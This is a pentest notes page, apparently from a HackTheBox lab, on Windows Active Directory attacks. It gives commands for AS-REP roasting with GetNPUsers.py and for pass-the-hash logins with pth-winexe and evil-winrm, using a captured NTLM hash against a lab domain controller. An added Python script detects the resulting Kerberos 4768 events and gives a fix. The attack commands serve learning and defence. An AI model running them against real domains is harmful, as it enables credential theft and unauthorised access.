# 04 Windows Enum & Exploit

## ExploitDB

`searchsploit -m` copies the exploit with the given EDB-ID into the current working directory:

```
searchsploit -m 48431
```

## User Enum

When you have a list of possible usernames, use GetNPUsers.py to narrow it down to the correct users and obtain their hashes. After that, pass the NTLM hash to [pth-winexe](https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/) or [evil-winrm](https://www.hackingarticles.in/evil-winrm-winrm-pentesting-framework/) to log in to the Windows system.

```
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
```

```
# Method 1: pth-winexe takes the credential as user%LMhash:NThash
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd

# Method 2: evil-winrm takes the user with -u and only the NT hash with -H
evil-winrm -u svc_backup -H b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192
```
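
Seen from the domain controller, a GetNPUsers.py run over a user list leaves Event ID 4768 records: failures with status `0x6` for names that do not exist, and successes with `PreAuthType` 0 for accounts that do not require pre-authentication. The following is an added example, not part of the original notes, that flags both patterns; the flattened record layout, the sample events and the threshold are assumptions made for illustration.

```python
from collections import defaultdict

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN: name not in the domain
ENUM_THRESHOLD = 3         # assumed cut-off; tune to the environment


def _rec(user, ip, status, preauth="-", etype="-"):
    """Build one flattened 4768 record (hypothetical layout, real field names)."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample records (not real logs).
SAMPLE_EVENTS = [
    _rec("jsmith", "::ffff:192.0.2.50", "0x6"),
    _rec("amartin", "::ffff:192.0.2.50", "0x6"),
    _rec("bwong", "::ffff:192.0.2.50", "0x6"),
    _rec("svc_legacy", "::ffff:192.0.2.50", "0x0", "0", "0x17"),
    _rec("alice", "::ffff:192.0.2.10", "0x0", "2", "0x12"),
    _rec("alcie", "::ffff:192.0.2.11", "0x6"),  # single typo, below threshold
]


def analyze(events, threshold=ENUM_THRESHOLD):
    """Return (enumerating sources, TGTs issued without pre-authentication)."""
    unknown = defaultdict(set)
    no_preauth = []
    for ev in events:
        src = ev["IpAddress"].replace("::ffff:", "")  # DCs log IPv4 in mapped form
        status = ev["Status"].lower()
        if status == UNKNOWN_PRINCIPAL:
            unknown[src].add(ev["TargetUserName"].lower())
        elif status == "0x0" and ev["PreAuthType"] == "0":
            no_preauth.append((src, ev["TargetUserName"], ev["TicketEncryptionType"]))
    enum_sources = {s: sorted(u) for s, u in unknown.items() if len(u) >= threshold}
    return enum_sources, no_preauth


def triage(events):
    """Rank no-pre-auth hits: 'high' when the same source also enumerated names."""
    enum_sources, no_preauth = analyze(events)
    return [{"source": s, "account": a, "etype": e,
             "severity": "high" if s in enum_sources else "review"}
            for s, a, e in no_preauth]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Any account this reports has "Do not require Kerberos preauthentication" set; clearing that flag removes the exposure.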

